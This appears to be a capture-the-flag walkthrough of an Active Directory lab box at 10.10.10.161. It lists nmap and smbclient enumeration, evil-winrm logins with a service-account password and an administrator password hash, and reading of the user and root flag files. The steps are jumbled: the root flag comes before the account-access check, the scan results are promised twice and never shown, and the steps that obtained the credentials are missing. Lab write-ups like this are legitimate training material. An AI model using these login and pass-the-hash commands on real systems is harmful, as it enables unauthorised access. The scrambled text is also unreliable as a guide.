The first step in compromising any box is to gather as much information as possible. This includes performing an Nmap scan to identify open ports and services.
nmap -sV -sC -oA forest 10.10.10.161
The scan results reveal the following:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
✅ User flag at C:\Users\svc-alfresco\Desktop\user.txt
Use evil-winrm again with the administrator hash:
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8
Now list the root directory:
cd C:\Users\Administrator\Desktop
type root.txt
Root flag obtained.
We have valid credentials. Let's check if we can access the machine. Since WinRM is open, we check if svc-alfresco has remote access permissions.
We can use evil-winrm to attempt a login.
evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Result: Access granted!
We now have a PowerShell shell on the Domain Controller. We can grab the user.txt flag from the Desktop of svc-alfresco.
We start with Nmap. The "best" approach is not to scan all ports blindly, but to target AD-specific services. The scan results reveal the following:
smbclient -L //10.10.10.161 -N
# No shares accessible without creds, but null session works